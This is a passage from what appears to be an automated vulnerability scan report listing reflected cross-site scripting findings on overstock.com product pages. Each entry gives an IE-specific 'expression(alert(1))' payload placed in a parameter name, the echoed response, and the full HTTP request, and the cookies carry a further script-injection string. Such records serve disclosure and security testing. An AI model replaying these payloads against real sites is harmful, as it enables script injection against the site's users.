GET /Office-Supplies/Cross-Cut-Shredder/4761404/product.html?99400"style%3d"x%3aexpression(alert(1))"b8b5d35490=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.504. http://www.overstock.com/Office-Supplies/Cyber-Gel-Stress-Relief-Ball/2614320/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b413"style%3d"x%3aexpression(alert(1))"ac9f6badee4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9b413"style="x:expression(alert(1))"ac9f6badee4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/Cyber-Gel-Stress-Relief-Ball/2614320/product.html?9b413"style%3d"x%3aexpression(alert(1))"ac9f6badee4=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.505. http://www.overstock.com/Office-Supplies/Fellowes-Powershred-P-58Cs-Shredder/3829872/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db3b0"style%3d"x%3aexpression(alert(1))"bc4750e83e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as db3b0"style="x:expression(alert(1))"bc4750e83e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/Fellowes-Powershred-P-58Cs-Shredder/3829872/product.html?db3b0"style%3d"x%3aexpression(alert(1))"bc4750e83e5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.506. http://www.overstock.com/Office-Supplies/HP-56-Black-Ink-Cartridge-Remanufactured/3420430/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2171f"style%3d"x%3aexpression(alert(1))"a3ec7cb02c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2171f"style="x:expression(alert(1))"a3ec7cb02c5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/HP-56-Black-Ink-Cartridge-Remanufactured/3420430/product.html?2171f"style%3d"x%3aexpression(alert(1))"a3ec7cb02c5=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.507. http://www.overstock.com/Office-Supplies/Ink-Cartridge-Combo-for-HP-95-98-Remanufactured/4274383/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66205"style%3d"x%3aexpression(alert(1))"b2b73b51621 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 66205"style="x:expression(alert(1))"b2b73b51621 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/Ink-Cartridge-Combo-for-HP-95-98-Remanufactured/4274383/product.html?66205"style%3d"x%3aexpression(alert(1))"b2b73b51621=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.508. http://www.overstock.com/Office-Supplies/Parker-Vector-Stainless-Steel-Medium-Point-Fountain-Pen/5072230/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91ba5"style%3d"x%3aexpression(alert(1))"feb2e9f4635 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 91ba5"style="x:expression(alert(1))"feb2e9f4635 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/Parker-Vector-Stainless-Steel-Medium-Point-Fountain-Pen/5072230/product.html?91ba5"style%3d"x%3aexpression(alert(1))"feb2e9f4635=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.509. http://www.overstock.com/Office-Supplies/Pilot-Varsity-Multi-pack-Disposable-Fountain-Pens-Pack-of-7/4222380/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb980"style%3d"x%3aexpression(alert(1))"78adf21d0d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eb980"style="x:expression(alert(1))"78adf21d0d6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/Pilot-Varsity-Multi-pack-Disposable-Fountain-Pens-Pack-of-7/4222380/product.html?eb980"style%3d"x%3aexpression(alert(1))"78adf21d0d6=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.510. http://www.overstock.com/Office-Supplies/The-Butt-Station-Blue-Assistant/3374082/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41a1e"style%3d"x%3aexpression(alert(1))"202b45fdd12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 41a1e"style="x:expression(alert(1))"202b45fdd12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/The-Butt-Station-Blue-Assistant/3374082/product.html?41a1e"style%3d"x%3aexpression(alert(1))"202b45fdd12=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.511. http://www.overstock.com/Office-Supplies/Waterman-Phileas-Black-Fountain-Pen/5072231/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 930e4"style%3d"x%3aexpression(alert(1))"c348c2ac806 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 930e4"style="x:expression(alert(1))"c348c2ac806 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Office-Supplies/Waterman-Phileas-Black-Fountain-Pen/5072231/product.html?930e4"style%3d"x%3aexpression(alert(1))"c348c2ac806=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.512. http://www.overstock.com/Sports-Toys/Eccotemp-L5-Outdoor-Portable-Tankless-Water-Heater/3650782/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6baf3"style%3d"x%3aexpression(alert(1))"4c015dbe715 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6baf3"style="x:expression(alert(1))"4c015dbe715 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Sports-Toys/Eccotemp-L5-Outdoor-Portable-Tankless-Water-Heater/3650782/product.html?6baf3"style%3d"x%3aexpression(alert(1))"4c015dbe715=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.513. http://www.overstock.com/Sports-Toys/Predator-Wear-Womens-Minnow-Snow-Pants/4333393/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2742d"style%3d"x%3aexpression(alert(1))"3e38f740d85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2742d"style="x:expression(alert(1))"3e38f740d85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Sports-Toys/Predator-Wear-Womens-Minnow-Snow-Pants/4333393/product.html?2742d"style%3d"x%3aexpression(alert(1))"3e38f740d85=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.514. http://www.overstock.com/Sports-Toys/Slumberjack-Gallatin-15-degree-Mummy-Sleeping-Bag/5077923/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2960"style%3d"x%3aexpression(alert(1))"a1c28941071 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f2960"style="x:expression(alert(1))"a1c28941071 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Sports-Toys/Slumberjack-Gallatin-15-degree-Mummy-Sleeping-Bag/5077923/product.html?f2960"style%3d"x%3aexpression(alert(1))"a1c28941071=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.515. http://www.overstock.com/Sports-Toys/Tour-Vision-Monterey-Edition-Sunglasses/3848541/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2c49"style%3d"x%3aexpression(alert(1))"d7f6f89bea1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f2c49"style="x:expression(alert(1))"d7f6f89bea1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Sports-Toys/Tour-Vision-Monterey-Edition-Sunglasses/3848541/product.html?f2c49"style%3d"x%3aexpression(alert(1))"d7f6f89bea1=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.516. http://www.overstock.com/Sports-Toys/Very-Bright-42-bulb-LED-Flashlight/3442486/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2c1d"style%3d"x%3aexpression(alert(1))"23b7b94528b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2c1d"style="x:expression(alert(1))"23b7b94528b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Sports-Toys/Very-Bright-42-bulb-LED-Flashlight/3442486/product.html?d2c1d"style%3d"x%3aexpression(alert(1))"23b7b94528b=1 HTTP/1.1 Host: www.overstock.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;
2.517. http://www.overstock.com/Worldstock/Agate-Inlaid-Handbag-India/544846/product.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19e6c"style%3d"x%3aexpression(alert(1))"b3d4d740baf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 19e6c"style="x:expression(alert(1))"b3d4d740baf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
